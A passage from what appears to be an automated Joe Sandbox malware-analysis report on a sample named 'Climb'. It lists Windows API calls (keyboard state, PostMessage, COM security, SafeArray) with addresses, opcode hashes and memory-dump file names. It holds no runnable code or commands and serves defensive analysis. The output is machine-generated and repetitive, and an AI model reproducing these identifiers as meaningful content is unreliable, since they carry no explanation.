                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AF37CA
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00AF37D6
                                                                                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AF3812
                                                                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AF3823
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AF6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00AF385E
                                                                                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AF387D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                                          • Opcode ID: f55be9708a493c3e9c068c603e53305da624080d2ef82073db555492886d93aa
                                                                                                                                                                          • Instruction ID: fcf71d997d1bd722a289042bdd685ae907200ede9097386974596eaacc17dc50
                                                                                                                                                                          • Opcode Fuzzy Hash: f55be9708a493c3e9c068c603e53305da624080d2ef82073db555492886d93aa
                                                                                                                                                                          • Instruction Fuzzy Hash: 04316D72201214BFEB258F94CC89FFB3BAAEB49751F044065FE099A291C6B59D41C7A4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                                          • Opcode ID: 29e931f36d34e6f64706a237a1f92b8873f5755a603537be37f83038a1da6009
                                                                                                                                                                          • Instruction ID: 4fc764f20e96f6eb0d50e9282c30093918ab2019c8cc08e5f407245d3bc83c97
                                                                                                                                                                          • Opcode Fuzzy Hash: 29e931f36d34e6f64706a237a1f92b8873f5755a603537be37f83038a1da6009
                                                                                                                                                                          • Instruction Fuzzy Hash: 44D1BF71E0064A9FDB10CFA9E895FAEB7B5FF48348F148169E915AB280E770DD41CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00AA1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00AA194E
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AA1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA19D1
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00AA1B7B,?,00AA1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA1A64
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AA1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA1A7B
                                                                                                                                                                            • Part of subcall function 00A93B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A86A79,?,0000015D,?,?,?,?,00A885B0,000000FF,00000000,?,?), ref: 00A93BC5
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00AA1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA1AF7
                                                                                                                                                                          • __freea.LIBCMT ref: 00AA1B22
                                                                                                                                                                          • __freea.LIBCMT ref: 00AA1B2E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2829977744-0
                                                                                                                                                                          • Opcode ID: 0636f8a33899edc9fc4001b92dd2758b26a75bc0545c88dc29964691e96fa24e
                                                                                                                                                                          • Instruction ID: 5fb79e8b1410cf28d69675576586fc94c525f53e3a317fd13ecdeb08c52b293c
                                                                                                                                                                          • Opcode Fuzzy Hash: 0636f8a33899edc9fc4001b92dd2758b26a75bc0545c88dc29964691e96fa24e
                                                                                                                                                                          • Instruction Fuzzy Hash: 9C91A172F00216BADF218FA4C991AEEBBB5EF0A350F184659E805E72C0E735DD45C7A0
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                          • API String ID: 2610073882-625585964
                                                                                                                                                                          • Opcode ID: 967d933ecc4de0269d62e5fe3db786780a13a285b044c7d8b7c10b7b65cce2e1
                                                                                                                                                                          • Instruction ID: e9d0dfcb17966a19d99f8bfe20e25923e2950d823a500fc7c03d3c57a7039461
                                                                                                                                                                          • Opcode Fuzzy Hash: 967d933ecc4de0269d62e5fe3db786780a13a285b044c7d8b7c10b7b65cce2e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 44918D71E00655AFDF20DFA6E848FAEBBB8AF45718F108559F505AB280D7709941CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00AD1C1B
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AD1C43
                                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00AD1C67
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AD1C97
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AD1D1E
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AD1D83
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AD1DEF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2550207440-0
                                                                                                                                                                          • Opcode ID: d22093dd7bb477b0ea2c7612adf79b29a9f283faf8148b936fa141fe74fd26b7
                                                                                                                                                                          • Instruction ID: 94fa09d688b47600d49fea987ad6a44315925e233433041de40c35d326aee07d
                                                                                                                                                                          • Opcode Fuzzy Hash: d22093dd7bb477b0ea2c7612adf79b29a9f283faf8148b936fa141fe74fd26b7
                                                                                                                                                                          • Instruction Fuzzy Hash: 1891D175A00219AFDB01DF98C885BBEB7B5FF04721F14442AE952EB3A1E774E941CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00AE43C8
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00AE44D7
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AE44E7
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00AE467C
                                                                                                                                                                            • Part of subcall function 00AD169E: VariantInit.OLEAUT32(00000000), ref: 00AD16DE
                                                                                                                                                                            • Part of subcall function 00AD169E: VariantCopy.OLEAUT32(?,?), ref: 00AD16E7
                                                                                                                                                                            • Part of subcall function 00AD169E: VariantClear.OLEAUT32(?), ref: 00AD16F3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                          • API String ID: 4137639002-1221869570
                                                                                                                                                                          • Opcode ID: 45393422bf50022ed62ccb6528af8fc22c170ef457aa8d9655232b5f9c5a3d82
                                                                                                                                                                          • Instruction ID: 4f48bb9a85ae4b00c04def401ce2ce4e2795392b80764561265afd28a407949a
                                                                                                                                                                          • Opcode Fuzzy Hash: 45393422bf50022ed62ccb6528af8fc22c170ef457aa8d9655232b5f9c5a3d82
                                                                                                                                                                          • Instruction Fuzzy Hash: 07914674A083419FC700EF29C58096AB7F9BF89714F14892DF89A9B351DB31ED46CB92
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AC08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?,?,00AC0C4E), ref: 00AC091B
                                                                                                                                                                            • Part of subcall function 00AC08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?), ref: 00AC0936
                                                                                                                                                                            • Part of subcall function 00AC08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?), ref: 00AC0944
                                                                                                                                                                            • Part of subcall function 00AC08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?), ref: 00AC0954
                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00AE56AE
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AE57B6
                                                                                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00AE582C
                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00AE5837
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                                                                          • API String ID: 614568839-2785691316
                                                                                                                                                                          • Opcode ID: bdf81232b86f60e329ab54ad1f517f66df305e30509941484707570b37dcc60a
                                                                                                                                                                          • Instruction ID: b6a3ae0e09654fec8e097f3340cb26de9085b908b307ec178c82140e567bc9c7
                                                                                                                                                                          • Opcode Fuzzy Hash: bdf81232b86f60e329ab54ad1f517f66df305e30509941484707570b37dcc60a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B910471D00259EFDF11DFA5D981EEEBBB9BF08304F10456AE915AB251EB309A44CFA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenu.USER32(?), ref: 00AF2C1F
                                                                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 00AF2C51
                                                                                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AF2C79
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF2CAF
                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 00AF2CE9
                                                                                                                                                                          • GetSubMenu.USER32(?,?), ref: 00AF2CF7
                                                                                                                                                                            • Part of subcall function 00AC4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC43AD
                                                                                                                                                                            • Part of subcall function 00AC4393: GetCurrentThreadId.KERNEL32 ref: 00AC43B4
                                                                                                                                                                            • Part of subcall function 00AC4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AC2F00), ref: 00AC43BB
                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AF2D7F
                                                                                                                                                                            • Part of subcall function 00ACF292: Sleep.KERNEL32 ref: 00ACF30A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4196846111-0
                                                                                                                                                                          • Opcode ID: 4a0e2b769abd1e7465d7474aa529f94dd83ea9fc26fbf9572e95b33104ec9b1e
                                                                                                                                                                          • Instruction ID: 0549697f068c6dd8c15be0c39726473a01d9c3383e0c6e02a8560e1c02df875e
                                                                                                                                                                          • Opcode Fuzzy Hash: 4a0e2b769abd1e7465d7474aa529f94dd83ea9fc26fbf9572e95b33104ec9b1e
                                                                                                                                                                          • Instruction Fuzzy Hash: 45716D75A00209AFCB11EFA4C945BBEBBB5EF48310F158459F916EB351DB34AD42CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 00AF8992
                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00AF899E
                                                                                                                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00AF8A79
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00AF8AAC
                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,00000000), ref: 00AF8AE4
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 00AF8B06
                                                                                                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AF8B1E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4072528602-0
                                                                                                                                                                          • Opcode ID: 5f9bf753a74b2b292934d24ece50645d0d0840e4933385aa3f83a7fca5398860
                                                                                                                                                                          • Instruction ID: 317e20b53f046973e07343ec22530f6d620a91b965178e02956031bbfe8d5249
                                                                                                                                                                          • Opcode Fuzzy Hash: 5f9bf753a74b2b292934d24ece50645d0d0840e4933385aa3f83a7fca5398860
                                                                                                                                                                          • Instruction Fuzzy Hash: F2718D74600208AFEB21EFE4C884FBEBBB5EF09340F14045AFA55A7261CB79AD41DB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetParent.USER32(?), ref: 00ACB8C0
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 00ACB8D5
                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 00ACB936
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00ACB964
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00ACB983
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00ACB9C4
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00ACB9E7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                          • Opcode ID: 168c09e08275b79d0b1fbdd84d971b8785c492194d52bded0b1cad501681009a
                                                                                                                                                                          • Instruction ID: cb71555ba078df16ed8783ea8f387b4365829a6fe7b1ad4b1329b17cff988266
                                                                                                                                                                          • Opcode Fuzzy Hash: 168c09e08275b79d0b1fbdd84d971b8785c492194d52bded0b1cad501681009a
                                                                                                                                                                          • Instruction Fuzzy Hash: 7E51E1A06687D53EFB3643348C46FBA7EA95B06304F09848DE1D5468D2C3EAACC4D771
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetParent.USER32(00000000), ref: 00ACB6E0
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 00ACB6F5
                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 00ACB756
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00ACB782
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00ACB79F
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00ACB7DE
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00ACB7FF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                          • Opcode ID: 32891963dad3c1b2f111f540b89f2b8b8d8721c04ab3a9fb950535b35e5dafcb
                                                                                                                                                                          • Instruction ID: 625273ae801f6ebe2a07288d2f5a6aadcbe2f300c3673ae7c99a004c1a73e7cf
                                                                                                                                                                          • Opcode Fuzzy Hash: 32891963dad3c1b2f111f540b89f2b8b8d8721c04ab3a9fb950535b35e5dafcb
                                                                                                                                                                          • Instruction Fuzzy Hash: F65123A09283D53DFB328374CC56F7ABEA95B01304F09848DE1D95A8D2D396EC84DB70
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00A95F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00A957E3
                                                                                                                                                                          • __fassign.LIBCMT ref: 00A9585E
                                                                                                                                                                          • __fassign.LIBCMT ref: 00A95879
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00A9589F
                                                                                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,00A95F16,00000000,?,?,?,?,?,?,?,?,?,00A95F16,?), ref: 00A958BE
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00A95F16,00000000,?,?,?,?,?,?,?,?,?,00A95F16,?), ref: 00A958F7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                          • Opcode ID: 90968377bb85f75d74e6769ba682bf3d9610c1565548512de315871cd3cdd808
                                                                                                                                                                          • Instruction ID: 192addb3f372829d42af217c6d1310c8f8f065a9ce568e560f4736916497bb0c
                                                                                                                                                                          • Opcode Fuzzy Hash: 90968377bb85f75d74e6769ba682bf3d9610c1565548512de315871cd3cdd808
                                                                                                                                                                          • Instruction Fuzzy Hash: EE51BF71E04649DFDF11CFA8D882AEEBBF8EF08310F14455AE951E7291D730AA41CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00A830BB
                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00A830C3
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00A83151
                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00A8317C
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00A831D1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
